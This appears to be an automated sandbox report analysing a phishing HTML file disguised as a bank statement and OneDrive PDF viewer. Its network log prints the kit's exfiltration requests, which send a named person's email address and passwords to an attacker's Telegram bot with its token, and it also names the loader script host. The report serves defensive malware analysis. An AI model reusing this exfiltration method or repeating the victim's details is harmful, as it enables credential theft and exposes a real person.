Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Bank_Statement.html

Overview

General Information

Sample name:Bank_Statement.html
Analysis ID:1637338
MD5:ec4d66fc535ca8f1fab725a82d2f78c6
SHA1:72a6202c963e31744f347935e4b20e78395055b2
SHA256:15bd43a93035d5fbc1d996d6744cc17a7b7c64e2a1e22e3c424d950c85be08d0
Infos:

Detection

HTMLPhisher
Score:88
Range:0 - 100
Confidence:100%

Signatures

AI detected phishing page
Suricata IDS alerts for network traffic
Yara detected HtmlPhish10
AI detected landing page (webpage, office document or email)
HTML document with suspicious name
HTML file submission containing password form
Javascript uses Clearbit API to dynamically determine company logos
Tries to detect the country of the analysis system (by using the IP)
Uses the Telegram API (likely for C&C communication)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected hidden input values containing email addresses (often used in phishing pages)
HTML body contains low number of good links
HTML body contains password input but no form action
HTML title does not match URL
IP address seen in connection with other malware
None HTTPS page querying sensitive user data (password, username or email)

Classification

Process Tree

  • System is w10x64
  • chrome.exe (PID: 6372 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 6708 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1948,i,13033855632054876856,16011394512874276020,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=1976 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • chrome.exe (PID: 6788 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\Bank_Statement.html" MD5: E81F54E6C1129887AEA47E7D092680BF)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

HTML

SourceRuleDescriptionAuthorStrings
0.4.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
    0.5.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
      0.3.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
        0.2.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security

          Sigma Signatures

          No Sigma rule has matched

          Suricata Signatures

          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-03-13T14:42:41.266321+010018100071Potentially Bad Traffic192.168.2.649742149.154.167.220443TCP
          2025-03-13T14:42:43.739594+010018100071Potentially Bad Traffic192.168.2.649743149.154.167.220443TCP
          2025-03-13T14:42:55.247199+010018100071Potentially Bad Traffic192.168.2.649752149.154.167.220443TCP

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          Location Tracking

          barindex
          Tries to detect the country of the analysis system (by using the IP)
          Source: unknownDNS query: name: geolocation-db.com

          Phishing

          barindex
          AI detected phishing page
          Source: file:///C:/Users/user/Desktop/Bank_Statement.htmlJoe Sandbox AI: Score: 10 Reasons: HTML file with login form DOM: 0.2.pages.csv
          Source: file:///C:/Users/user/Desktop/Bank_Statement.htmlJoe Sandbox AI: Score: 10 Reasons: HTML file with login form DOM: 0.3.pages.csv
          Yara detected HtmlPhish10
          Source: Yara matchFile source: 0.4.pages.csv, type: HTML
          Source: Yara matchFile source: 0.5.pages.csv, type: HTML
          Source: Yara matchFile source: 0.3.pages.csv, type: HTML
          Source: Yara matchFile source: 0.2.pages.csv, type: HTML
          AI detected landing page (webpage, office document or email)
          Source: file:///C:/Users/user/Desktop/Bank_Statement.htmlJoe Sandbox AI: Page contains button: 'VIEW DOCUMENT' Source: '0.0.pages.csv'
          Javascript uses Clearbit API to dynamically determine company logos
          Source: https://jrun.surge.sh/dasas.jsHTTP Parser: /*! for license information please see main.219cdd37.js.license.txt */ var vinem = document.getelementbyid('hi').textcontent; (() => { "use strict"; var e = { 110: (e, t, n) => { var r = n(309), o = { childcontexttypes: !0, contexttype: !0, contexttypes: !0, defaultprops: !0, displayname: !0, getdefaultprops: !0, getderivedstatefromerror: !0, getderivedstatefromprops: !0, mixins: !0, proptypes: !0, type: !0, }, a = { name: !0, length: !0, prototype: !0, caller: !0, callee: !0, arguments: !0, arity: !0 }, i = { $$typeof: !0, compare: !0, defaultprops: !0, displayname: !0, proptypes: !0, type: !0 }, l = {}; function s(e) { return r.ismemo(e) ? i : l[e.$$typeof] || o; } (l[r.forwardref] = { $$typeof: !0, render: !0, defaultprops: !0, displayname: !0...
          Source: file:///C:/Users/user/Desktop/Bank_Statement.htmlHTTP Parser: peter.nagengast@saabgroup.com
          Source: file:///C:/Users/user/Desktop/Bank_Statement.htmlHTTP Parser: Number of links: 1
          Source: file:///C:/Users/user/Desktop/Bank_Statement.htmlHTTP Parser: <input type="password" .../> found but no <form action="...
          Source: file:///C:/Users/user/Desktop/Bank_Statement.htmlHTTP Parser: Title: PDF Document does not match URL
          Source: file:///C:/Users/user/Desktop/Bank_Statement.htmlHTTP Parser: Has password / email / username input fields
          Source: file:///C:/Users/user/Desktop/Bank_Statement.htmlHTTP Parser: <input type="password" .../> found
          Source: file:///C:/Users/user/Desktop/Bank_Statement.htmlHTTP Parser: No <meta name="author".. found
          Source: file:///C:/Users/user/Desktop/Bank_Statement.htmlHTTP Parser: No <meta name="author".. found
          Source: file:///C:/Users/user/Desktop/Bank_Statement.htmlHTTP Parser: No <meta name="author".. found
          Source: file:///C:/Users/user/Desktop/Bank_Statement.htmlHTTP Parser: No <meta name="author".. found
          Source: file:///C:/Users/user/Desktop/Bank_Statement.htmlHTTP Parser: No <meta name="copyright".. found
          Source: file:///C:/Users/user/Desktop/Bank_Statement.htmlHTTP Parser: No <meta name="copyright".. found
          Source: file:///C:/Users/user/Desktop/Bank_Statement.htmlHTTP Parser: No <meta name="copyright".. found
          Source: file:///C:/Users/user/Desktop/Bank_Statement.htmlHTTP Parser: No <meta name="copyright".. found
          Source: unknownHTTPS traffic detected: 159.89.102.253:443 -> 192.168.2.6:49739 version: TLS 1.2

          Networking

          barindex
          Suricata IDS alerts for network traffic
          Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.6:49742 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.6:49743 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.6:49752 -> 149.154.167.220:443
          Uses the Telegram API (likely for C&C communication)
          Source: unknownDNS query: name: api.telegram.org
          Source: unknownDNS query: name: api.telegram.org
          Source: unknownDNS query: name: api.telegram.org
          Source: unknownDNS query: name: api.telegram.org
          Source: Joe Sandbox ViewIP Address: 138.197.235.123 138.197.235.123
          Source: Joe Sandbox ViewIP Address: 138.197.235.123 138.197.235.123
          Source: Joe Sandbox ViewIP Address: 159.89.102.253 159.89.102.253
          Source: Joe Sandbox ViewIP Address: 13.107.42.12 13.107.42.12
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.91
          Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.91
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.91
          Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.91
          Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.91
          Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.91
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.91
          Source: unknownTCP traffic detected without corresponding DNS query: 23.15.178.179
          Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.215
          Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.215
          Source: unknownTCP traffic detected without corresponding DNS query: 2.23.77.188
          Source: unknownTCP traffic detected without corresponding DNS query: 2.16.100.168
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.3
          Source: unknownTCP traffic detected without corresponding DNS query: 2.23.77.188
          Source: unknownTCP traffic detected without corresponding DNS query: 2.16.100.168
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.3
          Source: unknownTCP traffic detected without corresponding DNS query: 20.191.45.158
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /api/shellbootstrapper/consumer/oneshell?noext HTTP/1.1Host: shellprod.msocdn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /dasas.js HTTP/1.1Host: jrun.surge.shConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /mydata/myprofile/expressionprofile/profilephoto:UserTileStatic,UserTileSmall/MeControlMediumUserTile?ck=1&ex=24&fofoff=1&sc=1699045858892 HTTP/1.1Host: storage.live.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1Host: geolocation-db.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: application/json, text/plain, */*sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1Host: geolocation-db.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1Host: geolocation-db.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: application/json, text/plain, */*sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1Host: geolocation-db.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /bot7200992561:AAFePZ1ocgs5LbpGUhS_OlPJJHRggjnfXnQ/sendMessage?chat_id=-1002368253408&text=%0AClient%20IP:%2073.55.47.0%0AUser:%20peter.nagengast@saabgroup.com%0APassword:%20%3C6g?T%3E4{&j^&PvS%0A==== HTTP/1.1Host: api.telegram.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1Host: geolocation-db.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /bot7200992561:AAFePZ1ocgs5LbpGUhS_OlPJJHRggjnfXnQ/sendMessage?chat_id=-1002368253408&text=%0AClient%20IP:%2073.55.47.0%0AUser:%20peter.nagengast@saabgroup.com%0APassword:%20%3EV%|? HTTP/1.1Host: api.telegram.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1Host: geolocation-db.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1Host: geolocation-db.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1Host: geolocation-db.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: application/json, text/plain, */*sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /bot7200992561:AAFePZ1ocgs5LbpGUhS_OlPJJHRggjnfXnQ/sendMessage?chat_id=-1002368253408&text=%0AClient%20IP:%2073.55.47.0%0AUser:%20peter.nagengast@saabgroup.com%0APassword:%20M&x{ HTTP/1.1Host: api.telegram.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1Host: geolocation-db.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: application/json, text/plain, */*sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1Host: geolocation-db.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1Host: geolocation-db.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficDNS traffic detected: DNS query: www.google.com
          Source: global trafficDNS traffic detected: DNS query: api.onedrive.com
          Source: global trafficDNS traffic detected: DNS query: shellprod.msocdn.com
          Source: global trafficDNS traffic detected: DNS query: jrun.surge.sh
          Source: global trafficDNS traffic detected: DNS query: storage.live.com
          Source: global trafficDNS traffic detected: DNS query: geolocation-db.com
          Source: global trafficDNS traffic detected: DNS query: api.telegram.org
          Source: chromecache_73.2.dr, chromecache_79.2.drString found in binary or memory: http://fb.me/use-check-prop-types
          Source: chromecache_71.2.drString found in binary or memory: http://www.opensource.org/licenses/mit-license.php
          Source: Bank_Statement.htmlString found in binary or memory: https://api.onedrive.com
          Source: chromecache_97.2.drString found in binary or memory: https://geolocation-db.com/json/
          Source: Bank_Statement.htmlString found in binary or memory: https://jrun.surge.sh/dasas.js
          Source: chromecache_97.2.drString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=16&ct=1699045855&rver=7.5.2116.0&wp=MBI_SSL_SHA
          Source: chromecache_97.2.drString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&wreply=https%3A%2F%2Fonedrive.live.com%2F%3Fauthkey%3
          Source: chromecache_97.2.drString found in binary or memory: https://logo.clearbit.com/
          Source: chromecache_97.2.drString found in binary or memory: https://mui.com/production-error/?code=
          Source: Bank_Statement.htmlString found in binary or memory: https://p.sfx.ms/images/mask_icon.svg
          Source: chromecache_97.2.drString found in binary or memory: https://reactjs.org/docs/error-decoder.html?invariant=
          Source: chromecache_97.2.drString found in binary or memory: https://res-1.cdn.office.net/files/fabric-cdn-prod_20230524.001/assets/item-types/96/pdf.png
          Source: Bank_Statement.htmlString found in binary or memory: https://res-1.cdn.office.net/files/fabric-cdn-prod_20230524.001/onedrive-assets/onedrive-font-face-d
          Source: Bank_Statement.htmlString found in binary or memory: https://res-1.cdn.office.net/files/odsp-web-prod_2023-10-20.005/odclightspeedwebpack.manifest/193.js
          Source: Bank_Statement.htmlString found in binary or memory: https://res-1.cdn.office.net/files/odsp-web-prod_2023-10-20.005/odclightspeedwebpack.manifest/409.js
          Source: Bank_Statement.htmlString found in binary or memory: https://res-1.cdn.office.net/files/odsp-web-prod_2023-10-20.005/odclightspeedwebpack.manifest/723.js
          Source: Bank_Statement.htmlString found in binary or memory: https://res-1.cdn.office.net/files/odsp-web-prod_2023-10-20.005/odclightspeedwebpack.manifest/729.js
          Source: Bank_Statement.htmlString found in binary or memory: https://res-1.cdn.office.net/files/odsp-web-prod_2023-10-20.005/odclightspeedwebpack.manifest/807.js
          Source: Bank_Statement.htmlString found in binary or memory: https://res-1.cdn.office.net/files/odsp-web-prod_2023-10-20.005/odclightspeedwebpack.manifest/813.js
          Source: Bank_Statement.htmlString found in binary or memory: https://res-1.cdn.office.net/files/odsp-web-prod_2023-10-20.005/odclightspeedwebpack.manifest/en-us/
          Source: Bank_Statement.htmlString found in binary or memory: https://res-1.cdn.office.net/shellux/suiteux.shell.consappdata.6309a915a45b05b6cc5a.js
          Source: Bank_Statement.htmlString found in binary or memory: https://res-1.cdn.office.net/shellux/suiteux.shell.core.ebb558383b7f50284e57.js
          Source: Bank_Statement.htmlString found in binary or memory: https://res-1.cdn.office.net/shellux/suiteux.shell.mast.72e6f2c061a514ef5d7b.js
          Source: Bank_Statement.htmlString found in binary or memory: https://res-1.cdn.office.net/shellux/suiteux.shell.otellogging.fc5f5b8360bd8c2f7da5.js
          Source: Bank_Statement.htmlString found in binary or memory: https://res-1.cdn.office.net/shellux/suiteux.shell.plus.a2054ca6d9582224ed69.js
          Source: Bank_Statement.htmlString found in binary or memory: https://res-1.cdn.office.net/shellux/suiteux.shell.responsive.f9bb60ce88d67ac6c149.js
          Source: Bank_Statement.htmlString found in binary or memory: https://shellprod.msocdn.com/api/shellbootstrapper/consumer/oneshell?noext
          Source: chromecache_83.2.drString found in binary or memory: https://static2.sharepointonline.com/files/fabric/assets/fonts/leelawadeeui-thai/leelawadeeui-bold.w
          Source: chromecache_83.2.drString found in binary or memory: https://static2.sharepointonline.com/files/fabric/assets/fonts/leelawadeeui-thai/leelawadeeui-regula
          Source: chromecache_83.2.drString found in binary or memory: https://static2.sharepointonline.com/files/fabric/assets/fonts/leelawadeeui-thai/leelawadeeui-semili
          Source: chromecache_83.2.drString found in binary or memory: https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-arabic/segoeui-bold.woff
          Source: chromecache_83.2.drString found in binary or memory: https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-arabic/segoeui-bold.woff2
          Source: chromecache_83.2.drString found in binary or memory: https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-arabic/segoeui-light.woff
          Source: chromecache_83.2.drString found in binary or memory: https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-arabic/segoeui-light.woff2
          Source: chromecache_83.2.drString found in binary or memory: https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-arabic/segoeui-regular.woff
          Source: chromecache_83.2.drString found in binary or memory: https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-arabic/segoeui-regular.woff2
          Source: chromecache_83.2.drString found in binary or memory: https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-arabic/segoeui-semibold.woff
          Source: chromecache_83.2.drString found in binary or memory: https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-arabic/segoeui-semibold.woff2
          Source: chromecache_83.2.drString found in binary or memory: https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-arabic/segoeui-semilight.woff
          Source: chromecache_83.2.drString found in binary or memory: https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-cyrillic/segoeui-bold.woff
          Source: chromecache_83.2.drString found in binary or memory: https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-cyrillic/segoeui-bold.woff2
          Source: chromecache_83.2.drString found in binary or memory: https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-cyrillic/segoeui-light.woff
          Source: chromecache_83.2.drString found in binary or memory: https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-cyrillic/segoeui-light.woff2
          Source: chromecache_83.2.drString found in binary or memory: https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-cyrillic/segoeui-regular.woff
          Source: chromecache_83.2.drString found in binary or memory: https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-cyrillic/segoeui-semibold.wof
          Source: chromecache_83.2.drString found in binary or memory: https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-cyrillic/segoeui-semilight.wo
          Source: chromecache_83.2.drString found in binary or memory: https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-easteuropean/segoeui-bold.wof
          Source: chromecache_83.2.drString found in binary or memory: https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-easteuropean/segoeui-light.wo
          Source: chromecache_83.2.drString found in binary or memory: https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-easteuropean/segoeui-regular.
          Source: chromecache_83.2.drString found in binary or memory: https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-easteuropean/segoeui-semibold
          Source: chromecache_83.2.drString found in binary or memory: https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-easteuropean/segoeui-semiligh
          Source: chromecache_83.2.drString found in binary or memory: https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-greek/segoeui-bold.woff
          Source: chromecache_83.2.drString found in binary or memory: https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-greek/segoeui-bold.woff2
          Source: chromecache_83.2.drString found in binary or memory: https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-greek/segoeui-light.woff
          Source: chromecache_83.2.drString found in binary or memory: https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-greek/segoeui-light.woff2
          Source: chromecache_83.2.drString found in binary or memory: https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-greek/segoeui-regular.woff
          Source: chromecache_83.2.drString found in binary or memory: https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-greek/segoeui-regular.woff2
          Source: chromecache_83.2.drString found in binary or memory: https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-greek/segoeui-semibold.woff
          Source: chromecache_83.2.drString found in binary or memory: https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-greek/segoeui-semibold.woff2
          Source: chromecache_83.2.drString found in binary or memory: https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-greek/segoeui-semilight.woff
          Source: chromecache_83.2.drString found in binary or memory: https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-greek/segoeui-semilight.woff2
          Source: chromecache_83.2.drString found in binary or memory: https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-hebrew/segoeui-bold.woff
          Source: chromecache_83.2.drString found in binary or memory: https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-hebrew/segoeui-bold.woff2
          Source: chromecache_83.2.drString found in binary or memory: https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-hebrew/segoeui-light.woff
          Source: chromecache_83.2.drString found in binary or memory: https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-hebrew/segoeui-light.woff2
          Source: chromecache_83.2.drString found in binary or memory: https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-hebrew/segoeui-regular.woff
